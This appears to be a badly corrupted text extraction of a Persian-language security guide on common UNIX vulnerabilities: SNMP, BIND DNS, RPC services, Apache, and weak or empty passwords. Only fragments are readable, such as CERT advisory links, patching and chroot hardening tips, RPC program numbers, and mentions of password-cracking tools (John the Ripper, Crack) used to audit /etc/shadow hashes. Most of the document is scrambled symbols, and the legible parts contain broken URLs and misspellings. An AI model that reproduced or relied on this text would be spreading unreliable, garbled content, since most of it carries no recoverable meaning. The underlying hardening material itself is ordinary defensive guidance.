I 5 -, < - Y
SB
g SNMP " 0
#P< 7 & E $ )
SNMP ,
, b
) Windows Service (&B
SL
6*
$SNMP
6
SL $ #P
< )
6
7) Y
embedded
e 'j 4 7 L $SNMP
5 TG'"), )
F
2
6*
0 <
- Y
785/ Q
0
$() *
* SL
Q 0, <
-
&
- 5 "), ) % !
+,
6*
5 T G') SL e 'j 4 7 L l 'U )
SNMP
l ' R4 S @ :
P
5 CP
0, -,< K W L*
#P
<% !
6
0 < ,6 3
+
$ #P<
-, < % L
)
F
5 $SNScan N 4
6N
)
0 5 - Y
. Foundstone. http://www h @ n 9 "
" - Y
? #
#
0
SNMPZ F ) SL W L3
GF
?
^
% !
T G'd *
-,6
)
" - Y
SL )
"b
5
I5
A)
" ?
) #5
?
?
<"
67
# n.7
a < ,6 3
-
"2
Com/knowledge/free_tools.html
'
$
2
netstat
w•p ) w•w
)
! ". /0(123&
SNMP SL
I 5 ("c 7 B
5! $SNMP "
b3
) 6- N
H,, e G
?@ ?
("c
7,
U#
,
0
KF
0
(E
( E
2
6&
7 L
- 4- ."
)- @\X
4 )
F) N 4
6 @ " U4
(E
6U )
SNMP
E F)
7 B
5! 2 netstat-an
H,, )S @e G
$SNMP
-, < - Y
) e 'j 4 SNMP Community
] 13
F)
_ P
!
h,/ % H SNMP Community
F)
Community SNMP Y*
F)
6 <
! " %&
DY/ 7 ,H ?
0 5
")
456 123&
$l ' R4 S @ : %
DY/ I 5
6, "
-1 < $( ?
! "+ ,
I 5 $SNMPv3
) 6( 4 , K
27
456
SNMP ? 5 TG' g
?@ " - Y 7 ) X (,! 7
P
T,
" - Y
_?# 7
Patch *
2 3@
?
$? ,
$)
)
, 1 7 L*
"
TCP/UDP
w•w 7
,
4] , K5
0
K6
),.
agnt b
^
b
agnt
6@
B' #P
<
(E
6
% !
SL $-,
) )
P $
)
6-
,1 b
3
,
? &
P
A R 4 W L3
T
("c T
P
!89
y
SNMP
3
3
6N
"
?
6*
B'T) ' " - Y 0
? 5 V8
w•p 7 4 )
2#5 l ' J) 0
$?@ " ,G ) pqqq"), )
6
9
F) F 3 7 L
l '7 B
5! ?
6
-,< K
SNMP
B
SNMP agnt b
6
6
N&
SNMP " - Y 7
*
l '7 B
5! 0_TCP/UDP
) X #
- Y SNMP agnt
] 6-
$CERT Advisory CA-2002-03 5 5X j*
0 5 GF
[
6& ? G
?
1
) $,<
Q
0
(E
( E IPSEC
& ?&
B'
)
0 < +H )
` 6
?@ " - Y 7 ) X (,! 7
+, 8
456
SNMP ? 5 TG' g
I 5 $SNMPv3
) 6( 4 , K
P
T,
" - Y
_?# 7
W 3
"
2
0
)
) 7
$)
)
*
SNMP " - Y 7
P!
L )-
h,/ % H
g
,
O*
0, < )" @
W L3
3" ?
N&
6& ? G -, < - Y ] community
- Y _
( #.
] 6-
("c
:
2
0
I5
N
u&
("c
"W 3
P
F 7 # " - Y
(E
P
!
6&
$http://www.sans.org/resources/idfaq/snmp.php h @
6 ),.
-,< '
-, <
K
0
b)
w•w 7
B' #P<
) )
6-
l '7 B
5! 0_TCP/UDP
#
#40
4], K5
(E
$-, < & 5
$
,
F) F 3 7
6subnet 2 SNMP " E
'
B
I
&
- Y
SNMP
9
w•p 7
4 ) TCP/UDP
L
6N
,
I5 C
'
) X
y # B' ,
0, 6 ( E
Q
I c2 '
R4 S @ ^
2
U
1) U#
!"
1
23
4 0, <P
7 !89 "
)
0
)
%K
25
:
-, < =! > ?@
56 $
5B
!C
8
? ,
)
5L M 9
A
'D
(E
! 5E 2'
/)
F
&1@
6 GH )
5 2'
H? "
?@
P 4)
"
R4 S @ ^
3W 3 P
B
9
F) % 1
,
' ?5F
) - 5 - Y -,< 3 <
$
3 M ,6
%
,
, N ?#
-
) 6? "
& 5
?5F
^ 2
"
S @^
N &1@ )
S
6@, 5
D Y/ c
) [
3_
O * 7
<
\
R4 S @ ^
) 6 Y/]
) X
F 78#
" V,
,G
6A)
2
,
,3
%K " 6
O * M,6? G
Cod Red )
% !
7 !89
? @ > GP
8 $
B I
6
?
Q
6U )
6 &
$ ?5F
0, 5
) 6(
I
RN6 2
#P
<
E )
6
" - Y Z
I
N
) !
Y 785/
T) , % !
=GX ^
N` 6?), ) - # M 9
(
&@
I
J
0
,G
6
-
6
O*
I
56$ % !
-")
P % !
: ),
F 7, ,
, - .
6; . " -
"
M 9" ) , < % !
@)
&' * +
# $% !
6
R4 S @
<
b
R4
0, <
) U#
R4 S @ ^
F) B
!$
)
2
R4 S @ ^
R4 S @ d *
N 560
"
,< ,6 3 K
6 'G " U4
2
<) , , e G
% !
$ R4 S @ ^
"
6%
c
3
6
! 5E
4 63U
$
1
=GX
N 4) B - .
% !
6
R4 S @ ^
-, " )
<@ ? @
^
&1@ )
!
? "
F) " [
< )@
785/ ) 7 , , SB
g $,
6 '?5F
#P
<)
F
? ,
"
)
4 ,
1)
$
- < ?@
R4 S @ ^
"
% !
6 S
0
3
=GX
I
bP
G )
i:
"
-
\
785/
F
-, 5! -)
-
-")
K6
F
-
F
, 5
- Y % !
U#
R4 S @ ^
R4 S @ ^
("c
6%5G1
% <
B5# ) , Y 7 !89
? F
2 5F
("c 7 ,H )
6
I ;&2
- Y
-
? F i:
0, 6 ( E
)
- <
b
f
! "M &# ( $
% !
"
, G 785/ ?
? G _7) Y
2
?
6
# $U#
0
6 * ] U#
$ -,< ( E -
)
a- 5
BIND Domain Name System
Remote Procedure Calls (RPC)
Apache Web Server
Generl UNIK Authentication Accounts with No passwork or weak
passworde
Clear Text Sevices
Sendmail
Simple Network Mangement Protocol (SNMP)
Secure Shell (SSH)
Miscon figuration of Enterprise Services NIS/NFS
Open Secure Sockets Layer (SSL)
BIND Domain Name System
)
-
$ (Berkeley Internet Name Domain) BIND &'(
h
- Y DNS_Domain Name ] "
BIND 0
/ 5
IP h @
_http://www.srco.ir/ a
#P
<
\ " C L3 $ 785/ ( E
( E ?@
I5 S
^P
1
) $, -
- 4 #
(E
? ,6U)
M,6
0, <
R4 S @ ^
) -,
,
!"
#4
DNS T# < ")
BIND
K6
j
CA- CERT
785/ N " , 5
dOS \
K
:
l 'F
6v 4 T
"
0
H ?@
-,
) - Y DNS
;!
BIND -, 6 U )
Dos \ " F
>/ 0, <
R4 S @
,G %
Z
#4)
W
ZF
$ Dos \ " F
B
5F " 0,<
" F
!
L3
) X
",
Cache
< TP,
^
-, < =
7 K
&F Advisory2002-15
H
Overflow \ "
3
:
Resolver +
^
")
<
"
- 4
F ) DNS
3
2
$ 3
7 K
&F
",
F) :
5F
2
6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 ,
,, 0
5
" ,G " 6
N ")
2
0,6
<R "
R4 S @ ^
,
CA -2002 -19 CERT Advisory 1 0
" F
$
" $l '785/
K6
3 #
1 0
E
? & ) 9
785/
5 $ 6% 'S
:
? '
I5 ?
, $ 5 ,H
) Buffer Overflow
=GX
?@ ?5F
< TP, ,
L Bind deamon ? @ )
l '%
?@ "
- Y -,<
? G
? 5 M 9
? , ("c 6 @ (, ! a,
*
0
(, ! ) DNS U )
<8 BIND ? ,
)-
F
I5
785/ ) O * _Dos] Denila of Service
!
6U )
g7
% ,P I
/ - N F ) BIND " - Y
?@
0, -
I] ? &
- 4
,
R4 S @
O *
/)
N
?@ " ) - Y l ' GX) " ? 5F
- Y
@
,
6
6 @ ?), )
1G' I 5
2
3 PG
g
0
#P<
6-
'784 ? G -, 6 U )
F
" ?5F
0
R4 S @
- 5 U
2 , 0, 5
-
3O *
,6 3
BIND "
SL ?@ )
*
1) U#
Ž6, 6 U )
1
&
S
- $() *
, -, < K BIND " *
#
+,
6
? G? &
5 C
P
,
#47
0,< ,6 3
+
)
) K % !
BIND "
- 5
6Patch 2 3@ " - Y
K
? 59 BIND *
?@ "
" - Y 7
SL BIND #
5 %
S @ T5 / $,< -,
Patch %
, 6 3 j 5 X.Y.Z 7
Level Patch
)
?@ )
"
?@ ?
)-
, N
2 3@ "
H
0
)
Z) *
Symantes
6 @
-,< ( N
N 4
- Y & $
I
" ?
R4 S @ ^
d *
P
3
$
0 < ,6 3
4
"
BIND
bP
)
-,<
F)
R4
W L3
Y$ B
-,6 X
*
N
4
2 3@ 0 5 SL
#
5
2
'
ISC
>! $ BIND
6-)
0
I 5 DNS
R4 S @ ^
*
2 3@ $
6, 6
6
! " %&
a
/
-,< SL BIND *
F
6 #) "
-,<
2 3@ SL "
-, < K BIND *
N
,1 b
0 5 %
*
7 K
&F -, 6,
Version 9.2.2 v
bP
-,< SL
X !] -,
5 ,H
Q
L
ISCb
'
)-
6
-, 6,
$
7
BIND #
^
:
?
(N
/ ? 59 BIND *
("c 7 !89 v named a
0
3 *
( E _-,
dInternet Sofward Consortium :ISC
! ". /0(123&
%
nH
456 123&
DY/ I 5
)
•
l89 & named ?@ ] BIND deamon ? 5 TG' g
_
N 4
I 5 0, -,
BIND &'(
'
?
DNS -, 6 U )
I
? G
_?@ ,E ? 5 TG' I ] W 3 7
K6
u 3
0 5 MR/ 6
)? ,
,1 b
6Patch -, 6 U )
-,< K
B5# 7 !89
'
0, 6 Z
Checklist j* ) CERT
"
*
N
(N
2 3@
" BIND
-,< K 7c
T5! "
) "
•
I5
?@ ?# 7
2t
5: SL
:
0, K5 - Y $ UNIX Security
Banner
^
g *
j 4
)
785/ ? 5
BIND GH ) *
- 5<
-, ` 4
) MR/ BIND "
•
I5
Version String
0, K5 2 &N F _ named DNS servers) % '
DNS
[? , 6U)
Zone 7c
Zone 7c
C
'
T
GH )
•
?#
? # _secondary DNS servers], K5 6 'Domain
^P
Child ) Parent
^ P
? # " %
) T G'
g
0, K5 - Y _Forwading] y
#B
5! %
DY/
6 Domaion
R )] Delegation
) ') _ 1t
•
glue fetching ) Recursion ? #
I5
0, K5 TG' g DNS Cache i .
5 ?
H
. ) named" " - Y
[
non – privilage
:
? G BIND 2
Privilage h @ " BIND 9 - 5 < *
DY/
, K5 ),.
•
I5
BIND $
Z F Chroot
0
0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @
BIND -, < =
R4 S @ ^
bP )
3 785/ %
DY/ I
a 5 - Y
h @ " ISC
BIND
0
h @ " ISC
0
:
Dos
R 4S
@
" ?
:
•
- Y http//www.cert.org/advisories/CA-2002-15.html
BIND
- Y
9
"+
8
:
DoS
R4S
@
: 2,
http://www.isc.org/products/BIND/bind-security.html
•
6
)
BIND
25 SL
I 5 ("c 7
4" - Y ) 6@
) Running the BIND 9 DNS Server Securely a h @ " ?
0 5 - Y Afentis h @
$U c
-,< K 7c
<@
Remot Procedure Calls
(RPC)
K62 )
F
H
B
5! - N F
F
0, <
U)
( E
K
I
" )-
T
n 9 " ()
?@ " - Y RPC
- Y NIS ) NFS % 'V < $ ) - "
,
I #P
< -,< +"
6
; G RPC
,G
6=GX
F)
6U )
Q
RP @
? 5F
RPC
6" E
6
" - Y
T % ) ) 1999 T
RPC
,G
RPC " - Y
6
T) ,
I
?@ "
f
F
)-
T 5G ,/ " j
0,
)
H"E
@
=GX
S
DoS \ " 785/ Q
R4 S @ : )
: %1
, $ #
g F
I
F) & C 3 0
0,
i:
& @
' )-
y
6,
-,< =
-
785/ 8Q
RPC
\ ' 7 ")
6U )
RPC DCOM
;! "), )
?@ )
U
R4 S @
^
- $() *
-,< SL RPC
F
2000
^P
:
#
ZF
3 M ,6
K6
-
(
2, ,
0, < , 6 3
=GX
6
-,< YB* 785/
+,
1
) U#
6*
5
0, < P , , e G
! ". /0(123&
"
# Z F" ?
$ rpcinfo"
a,
RPC
Program
)
- @
R4 S @ ^
)
N 4
" - Y
RPC T) ,
6U )
RPC SERNIS
Number
100083
Rpc. Ttdbserverd
P!
Rpc . cmsd
100024
Rpc.statd
100005
Rpc.mountd
100232
sadmind
100235
Cachefsd
100249
Snmp Xdmid
buffer Overflow 785/ n 9 " C 5! RPC
H- Y Z
6-
100068
) 6:3 W L3
' ) ("c
? # 2 $ Buffer overflow
R4 S @ ^
_O * , 7 L SB
g]
j4% H
) Z:3
:
, <P -, "
b
RPC
, 5
F
, 5 T
, B ) h / K6?#
O * , Overflow & @
1
" E
RPC
g-
F =GX
4 - Y
6U )
l ' R4 S @ ^
( E ,!
"
" ,G #
" & @
0, 5
2
6
- Y
4
) X
RPC
"
$
I'/ ?)
1
-
6U )
"
K6U )
:
.
"
Z F% !
Z F T 5G ,/ " j
g
6
?# ,
456 123&
P%
DY/ I 5
•
6MR/ ) ? 5 TG' g
0,<
F) ? @ MR/ ?#
$-
, 5
F
) - " )"E
RPC
) )
6 'F
! " %&
a
B
! 0,
b
' F
' - Y ,
6'
6U )
5 #P
< )
?@ "
•
-,< K Patch 2 3@ SL
a
0
- Y _http://sunsolve.sun.com ] h @ " U c
http://www.ibm.com/support/us
0
a h @ " IBM
,
&'(
AIX
- Y http://techsupport.services.ibm.com/server/fixes)
) http://www.redhat.com/support/errata a h @" U
0
7
L
http://www.debian.org./security
- Y
Patch 2 3@ SL ) 6 @
9
1
I5 E F7 B
5!
0 <( E 5
135 7
4 ) RPC
portmapper
0, 5 V8 T) ' )
UDP ) TCP
, K5 V8
$ l ' J) "
785/
5 %
785/ "
3
B
^
32789, 32770 Loopback
6
DY/
windows
) i:
^
B!
_ UDP ) TCP] 111 7
^
)
F
c $ KF
F
[
g
B! ,
g
4
5
4
4
_UDP ) TCP]
67 4
? 5 TG'
" - Y 0, 5
5/
1
) - PBuffer overflows
0
TP
" %/
NFS % ' 6
$
,
^P
a
6
P IP/ ? & " - Y
1
, 3 b'7 L
R4 S @ ^
- Y
"
6h @ " ?
RPC ^
% ' 6
j 4
:
,
#4
nfsbug" " - Y
B5# 7 !89 R 3
a 5
http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html
http://www.cert.org/advisories/CA-1997-26.html
http://www.cert.org/advisories/CA-2002-26.html
http://www.cert.org/advisories/CA-2002-20.html
http://www.cert.org/advisories/CA-2001-27.html
http://www.cert.org/advisories/CA-2002-25.html
http://www.cert.org/advisories/CA-1999-08.html
http://www.cert.org/advisories/CA-2002-11.html
http://www.cert.org/advisories/CA-1999-16.html
http://www.cert.org/advisories/CA-2001-11.html
http://www.cert.org/advisories/CA-1998-12.html
http://www.cert.org/advisories/CA-2001-05.html
http://www.cert.org/advisories/CA-2002-10.html
http://www.cert.org/advisories/CA-2003-10.html
http://www.cert.org/advisories/CA-2003-16.html
http://www.cert.org/advisories/CA-2003-19.html
Apache Web Server
0
)
5
O) ? , 6 U )
78#
(A-2002-,CA-2002-2717]
-
a
3W 3
R4 S @
6 ' " 7, ,
F)
& PHP ) CGI
0
bP
!
?@
)
4@ -, 6 U )
_DoS] U )
h / 6-
-)8!
6 „1#
& O) -, 6 U )
" $?@
4@
? `56 1
) <
R4 S @ ^
R4 S @ ^
F) 7
# _Apache]
O) -, 6 U )
4@ , ) 6T)„
3W 3
R4 S @ ^
"
4@ $ _IIS] ' #
) %K
0
6=GX
2 1
),
? 5 TG' g
) 6% '2 3 , - 9*
)j 5
) - " -, 6 U )
_
3)
#
] -, 6 U )
? '- 9*
$() *
,G )
e '7 L
4@ $l '? #
, 5
- Y "), )
3 W 3 R4 S @ ^
4@ 0, <P
-)8! 0
4@ Z F
SL $ U
I =B*
B!
,
&
H U#
6
1) U#
"
4@
+,
N
6*
6*
&
)
5
"
"
?
" \ 2 0 5 SL &
0,<
+
4@ SK-, 6 U )
R4 S @ - . W L3
("c 7 !89 S
a 5 - Y
h @" ?
! ". /0(123&
"
6@
I5
6h @ " ?
$
Apache 1.3.x
:
•
http://www.apacheweek.com/featurity/security -13
h @" ?
Apache 2.0.x
| http://www.apacheweek.com/features/security-20
•
R4 S @ d *
ah @" - Y
- .
I 5 ("c
0, < P
'7 !89
G X) Z
W
0
"2
,Y
$-,< - <
6h @
("c 7
4)
L3
& http://httpd.org/
! " %&
a
K
"7
4$
456 123&
4@ O) -, 6 U )
DY/ I 5
•
-,< K patch 2 3@ SL " ? 59
"
6 @
http://httpd.apache.org h @ " ?
I5
:
2
0 5 - Y levels Patch ) 6 *
h @" ?
$
4@
Q code Sourde
6*
6Patch 2 3@
-, < K
I5
http://httpd.org/download.cgi
0 5 - Y
h @" ?
GX) 2 3@
'
) 6 @
I5
0 5 - Y | http://httpd.org/dist/httpd/patches/
" ?
$
4@
6*
code
Q
Source
I5
0 5 - Y http://httpd.apache.org/download.cgi h @
h @" ?
6Ptch 2 3@
-, < K
0 5 - Y
- Y ? @ " +F ? G
#B
5!
mod
.
I
4@
(
R4 S @ ^
"
("c :
("c 0,
-
"2
% 5
2
4@
)
)
$ I 2,
),
) X
6-"
.ZF
5 _CA-2002-27] –ssl
%
- 5 - Y SSL
O F$
? G
4
E " E %H ,/ W 3
0
4@
0 < ,6 *
$ chroot
Login
8Q 0
C
/
0
)
- Y
•|•
G',
c
0, 5
$ -, 6 U )
0
6)
I5
! patching " ? 59
,B
6T)„ C
'
- < # 2
Open
) 6 @
http://www.apache.org/dist/httpd/patches/
% !
) X
'
F"
l '-)
,E = G ;!
B 4 Chroot
) •ROOT
, E = G;!
? G,
Chroot 0
session
F
6% '
5 -,6
F W L3
H $, 5 , 4
6
),. $ l '
) E $ /chroot (
U)
4@
?@
F
3
G',
- <&
S
I 5 O) -, 6 U )
0,<
&'(
0
- Y
)
7,
F 3
*
"
9
1G'W L3
, 5
3
0 '
#
("c
?@
K loggingW L3
'# < ) [
U)
:
6% '
6 '? @
a 5 - Y
g
'
6T)„
I
)
, "
S
?@
I5
B
"+
" ,
6A)
? G$ I
I5
) -, 6 U )
g
) R3
4 ) 6 BH $
logging 7 B
5!
H
)"E
B'
,G
("c 7 , 5 ? @ &1 @
6%
1G'\
4@ -, 6 U )
("c 2
6
0, 5
?#
4
, ?# S
•c 7) Y
2, 0
6
6
6U)
,
F 7 !89 " W 3 I
) •c
!89
!89 +P
2#5
W L3
3
4@ Chrooting
("c O) -, 6 U )
R4 M :G
7 L c
4@ -, 6
6- Y Z W L3
F) chrooting
-, 6 U )
F %K
15 /
)
K W L3
6 ,'
5
F) chroot " z 3 ) % !
+
P ) <
6 #6
6U )
?# $, 5 " g@
P F7 [ ,
9P
3
0 5 Z F chroot b.
?@
b.
< TP,
"
H /chroot/httpd
("c 0, 5 6 '
B
:
)
F & 7
2, 0 < , 6 *
^P
,6 *
I
6j*
# 2
CGI,PHP
0, @
4@ #
F
c
2
0
1G') Z F chrooted 7 L
'#
-)8! 0
W 3^P
>
P l'
S
),.
:
8Q 0,
C
5<
'
6 '$-, 6
<
K<@
(E
< @ •c
I 5 0,< ,6 3
http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x
0 <- Y
http://httpd.apache.org/docs2#5 -, @ j 4 b <
F
h @ " Apache
)
)Y
2.0.x
0 < - Y 2.0/logs.html
) CGI , PHP " #
?
)
•c
<
P
[
l ' GX) 0,<P '
,,
$
( ,H $
- Y Π#
=GX
POST ) GET
W L3
S
j< 4
0, 5
6 'O)
6% '
("c
&1@ ? j &' I 5
)
O) -, 6 U )
- 56 l '
^ P
0, 5
6
_detection Intruder] 25/&
N 4)-
6
^
mod_Security n 9 " ,
R 47
6
.
6 „ 1#
7 B
5! ? 5 •c 0 5 POST ) GET
bP
O)
P
" - Y Z ) F
ModSecurity
d *
•c
F
5/
0, 5
"
K
N 4
F
" $ ModSecurity
4@ -, 6 U )
-http://www.modsecurity.org/
-http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126
a
#
4
N ],
Z
"
5 T G' g
I5
,!
#
, 5
F
2
6? "
0_,<
<
F
6 ' Apache User Id
H
, 5
6 '
User Id
F
:
,F
)
- Y 7
#B
5! - .
K<@
,
- 5
- Y
4@ . 6
? # 2 SuEXEC
4@ ?
. CGI ) SSI
) 6@
P
I5 ) :
2
a 5 - Y
"
/
6
2 , 0 , < O) -, 6 U )
L 3 CGI )SSI
-, < <
,< ("c j
3 $ setupid Root
$
User Id
%
b
" - Y
) X #
7, , S
0, < , 6 3 MR / $ ? 5F
) X
SSI
?@ ( &1) -, 6 U )
P 7) Y User Id
" - Y
- Y )
F) ? @
) PHP,CGI,SSI "
F ) 2 < ?# ) j6
;!
) PHP,CGI,SSI
F ? # $ SuEXEC 0 < - Y SuEXEC "
3 'P
9
")
) SSI,CGI,PHP
#
Server Side Includes
3 ,
6? "
06
#
",
0, K5 TG' g
#
:
SuEXEC
(
3 <) S
0,< ,6 3 N
6h @ " ?
6
,
# 4 (,!
6- Y/
SuEXEC "
http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x
0 <- Y
http://httpd.apache.org/docs- h @ " Apache
2.0.x
2.0/suexec.html
0 <- Y
) cgi- bin
6
0,
MR/ $
5 e 'j 4
B / " S1:
. W L3
6
#
F
a
5
HTTP header
("c ) ( E 6
l '\ X
40PHP "
23
- < W L*
("c
5 )
7 !89 K ; !
C
'
6
)-
#
% <
25
z 3 1 2
4 ? 5 T G' g
a
B5# 7 !89
safe 1/
'
PHP
h @" ?
W
8Q 0
C
G X)
P
I5 ' X
0 < Corss Site Scripting XSS %
h @" ?
L3 2
http://www.securityfocus.com/printable/infocus/1706
0 5 - Y
T)„
W
L3 2
"
,G
mod_Security
B5# 7 !89 -,6
Injection SQL&XSS % < R4 S @ ^
0 5 - Y
1
)„ " - Y
DY/ ;! ,
0 5 - Y
&'(
F " ? 59 T L.
#
:
) &5
2
0
56 &K/ &
# _ http://www.cirt.net/code/nikto.shtml h @
0
<@
http://www.modsecurity.org/
6
6& " ?
)
CGI
% H] Nikto
)j 4
6& 2 P
,Account
2N P
2
9P % G
$?
,K
,6 3 N
$?
6
<)
6, )
Q0
b
,K
f ) T) ,
-,< K
P!
6&
$
C
5
e *f 2N P
<) $ P
!& " - Y
!89
$-
6
)?
) % ' DY/ I
?@"
0
6) 6 '-,< d *
,6 *
E +
+
?@
" - Y
?# $?
H $-,< -
P
, K " U4 0 <
6" E ) 7 "
F
$
-,< , K +
?@?
"E
1G'$
SB
g
$
-,< , K +
?@?
"E
1G'$
SB
g
, KF) ,
?@
(E
DZ
H$
E
N`6?),
)
?@ =GX
)
)
/j
)
R
0, < ? "
b
P
!&
:
P! &
^P
< TP,
-,< K
6account
Y
6%
4"
75 I
#
u
P!
F)
2
) X$ 5 - Y
, N) = G 0 <
3\ P ? "
€
+
"
? "
% < P
!&
•
-,< = G Account
P
!&
6&
" ?
S
•
DY/ (,!
0-,< = G
, account E ?# $ F
,H ') = GX
6 &'(
4
5! , B
<R hashing
, "
-,< & ) -,<
N -, @
DY/ 2
N1
S
P
3
h
83 ( '$ hash ,
/
< ,6 3
SB
g
F) 2
)b
P! &
•
N1
$ hash
)E $
-, < 3 < $_
?@ ,6
•
6'
P! & Hashing
) ) ,
, Hashe ,
0
N& ]
P
!
)% !
0, 5
,
/
B
5!
-)8!
+
2 1
), ) 2
$
,
6-, 4,
-, < 2),
" I'
6 1G'
P
! & ,H ' ) = GX account
P
! & ,H ' ) = GX
6& ( #.
-
<
\ ' i: 21
)
a
0
•c
H ,F 7 , , e G
- 5 account
R4 S @ ^
,6 3
!89
0,6
,F , , ,
% !
9
" )-
) -,
) , K " U4 ? @]0,<
0_
F ) -, < = G
U 4 ,<
1G' #
,
P
!& 2
" U 4 ?5F
,63
P
[?@
, -,<
P
! & 2'
+
H
5 $
?#
3 1
)
- 3•
6% 5G1
$ F
?@
-
, 5 ,H
6& " - Y
0
P! &
)d*
7
P
!& ?
"
S
d
GP$
P! &
) ( #.
2
= G
W L3
("c
! ") *
) User ID
&
h
?@ ?
,K, @ '
0
?
) ,G ?
$, 5
DY/
,
2
P
!
6account ,
, ,F
? "
F
<d *
6 'F
)
"
- Y
<
,
) " g@
S
P! &
# )-
b
hash
) 6 'hash
d *
?,
N ], 5
I 5 MD5
crypt 5 , H
• Y%
P
!&
?
?@ "
:
5 $l '
,6 3
%.
?
, K ?#
"
etc/shadow % '0,
P! &
"
2
0_,
(E
? 5 -
3•
6
2
1
&
!89
6% 'V <
K6U )
I5
- 3• I 5 etc/shadow
u -,
N10 5 - Y &
SL b
P!
l'
6& ? 5
0
I 5 -, < + "
H
("c
- 3•)
hashes
N1?
0
3 A8 $ cracker
C
'
- Y hashes
S
4
/etc/passwd % '?, 3
F
3 % H root
3
- 3•W L3
?, 3 ?#
) 2 #<
N1" S
"
5 b
6account #
B
.
b < #
P
!&
) /etc/passwd
F) #P< ?
?5F
)
? "
#P<
I 5 ? 5F
5 L hashes
/etc/shadow
BH 0, <
b
P! &
P
!
! ". /0(123&
) -,< <R V <
!89 +
)
,<
K6account " #
- Y
6& " ?
'& , < h, / % H
6
,6 3 , , 2 e G
<
#40
+,
)% !
+
H
("c
25
d[Network Information SystemZ NIS
,
NIS
/
0
! 5E % < ) 6 '
#P
<
,G
,
(Mapping) U )
?#
7 !89 ) - 5 %5! 6U )
H Network File System (NFS)
, 6,
hash
P
!
P
!
% < NIS ,
6&
#4
6& C
85! ) 6 '?
) NIS+
P!
* ]l ' 6*
,
%#
),
!89
I #P< 6U )
3
6
? @ ?, 3 ?# ,
- 4 , ,F 6 *
6&
"
6% '$-, @ %5G / 9
5
I $ NIS " -, < "
N ], <P hashes
F
^
("c ^ P
2 )-
0,
H,, e G
C 5! LDAP
("c ( #.
# 4 ) I 0_ ,
u -,
?@" - Y ,
F
SL b
l 'b < #
2 56) -
%#
$_, ,F 6
0, 5
-, < "
,6 3
F)
F) $
) etc/shadow b
47 #
'
b
P
!&
=GX a I
- < $, - 5 V
5 ,H ?
j4
- Y
N ,G
3
$l ' # ) 0,<
1
), 5
? ,
0, 5
- Y
:
c 5G
C
6U )
#4)
)S
P
!
) N
("c
4 5
6
GP $
- 5
6&
7
L
" %/
P
!
6&
=GX %
<
SF
("c
? , b
0? "
%
)=
! 5E SL
g
6U )
, <P
456 123&
6%5G1
G?
a,<P S
"
P
! & ,H '
\'2 P
5/
6
e '
! " %&
"
$ 5
SL 7 B
5! #
) X
)
6
"
)% !
K6account )
6account
("c ) - 5
6U )
<
6? "
#P
< )% !
b
2
g
)? ,"
%
,
^
2
9
/
I'.
:
6A) " :
) X g
L
6&
?
< TP, &
) = GX e 'j 4 7
P!
) h, / ? # $ ,
account ? 5 TG' g
^
$ #P< )
! 5E
6& d *
3? "
6SL 0
,
P
!
hashes
)2
-
b
#.
5#.
? @ ( #.
K
S
&' * " - Y
?
P
P
!
d *
N F- 5
$, < -, < 3 < 5B
A" @ $ 6? "
?@
)-
-J )
"
3?
6
P!
!
M) / ) ,!
\X
)
5 $O 3
P
!&
?
("c
2
I 'L
c 9 <
6&
P
"
%5
Q
O*
N F2
0 <-
0 , K5 = G 3
-,< 3 < (
B' (
) " )@
( $O
W 3
(E
*
-
93
?@ d *
$
&
" $ "
" U
(8!
6&
,1
<P?@
"
I 5 ("c % 5G1
" ?
T
("c A"
6 #) h
&N F
E
P 785/ ?, < F
7
H?
-
- < # 2
?@ _
H I
("c 0
)@
?"
2 ), " U 4 0_‚
, P4
) 4 " ? 59
]
" ) -,<
1
) K5 - 3•
-, < F
I5 ?
I5
@
? !$7 P
!
6&
3•" M, 6] , <P %#
$ -, < = G
6 % 5G1
P!
P
!&
" ) - 3•
P
!
%5
#
/
) 5B
E ) O * W L3
5 MR/ $ 5B
-J)
password
d *
6&
P
= G
_pa$$w0rd], 5
-
6
-,< Y
P
!&
$_
-J ) M) / ) KP
Y1M) / "
("c
Y
3
M) /
• ,G
6&
O* ,
,
0_? @ =B*
P!
$ 5B 6M / 2 1
) 2' ]
)
#
:
0, < ,6 3 crack $
0,< -,< h PH
(E
],<
"password" (
K6
P!
SB
g 0
= G - . W L3
2 ?
H&
"
6
P
!& 2
M) / % ,P ( ,H C
'
A)
6A) " - Y
,6 3 785/ " \ 2
KP
Y1M) / "
I5 ) - 5
)6? "
?@
" ,G 0
' ? "W L3 )
P
!& d *
" - Y ) ,G
•
" ? 59
6?
' T /2 !
<) "
S
) ( #.
P
!&
7 B
5! $ & @
P 785/ (
6
6& ( E
0 5 crack
2
P
!&
$
T#<
A" @ ) S
,G
PF 62 )
T 5! " U 4
P!
6&
.
2
& 2
0
% 5! " U 4
P
!
6&
Npasswd " ,
6
U
: -, < d *
6 *
6
0, 5 - Y
. 7
]Cracklib " ,
*
?),
? ,
- <\ X
)
6
P
!
$
I5
I
#
0, 5
F) Enabled
,
crak ?@
6&
1/ Cracking
C, E
P!
("c , <
5 $? "
,<
P
'7 B
5! ?
("c
6" E
0
( E -, <
6&
("c
v 4
& _ E
2
"
6&
O * - . W L3
+H ) F
u
5 John the Ripper , (4lc4)10 phtcrack version
K6
P!
7
6&
? G ) stand-alone
- Y cracking
" - Y $= GX
b
& PAM-Enabled
P
!
2 )
u
P
!&
#P< )
L $
P
!&
%
7
K " U4
?
" ,
"
DY/ 2 <
Q0
6
N
" U4 0
5
b
6% 5G1
I K6 & " - Y ?#
? , " ("c " E S
S
6
- Y -,<
?
) Npasswd
5
l' 6
) ("c
F
N656 I 5 ("c
,
PAM-
S
1) U#
Q 0, 5 - Y
_ Crack
$
E
0
6%5G1
) A & l ' GX)
)C3 0
"]
K ? @
I $?
,K
& S
I5
N
K <)
0
hashes
0
P!
6&
#
0 #.
- Y etc/shadow/ "
F) hashes
I 5 A8 ) hashes
" - Y W L3
\
2 #
- 5 (N
P
!
6&
("c
"
0
3
P :
(E
2
LDAP ) NIS
6" E
$, -,
2 &N F 25
6 & ) 25
9
6" E
- 3•/etc/passwd
) NIS
?,
6
)
$, -,
#
H
6$, <
0
, 6 3 ? @ cracking
6*
5
•
DY/
$,
Z F LDAP
DY/ ? #
6&
-,<
"
) <
25
F) 25
2&N F 25
<,
6 &
g
9
6
- Y %
4 :
- Y MDS
N1"
2
0
- Y
6& ? 5 hash
P
!
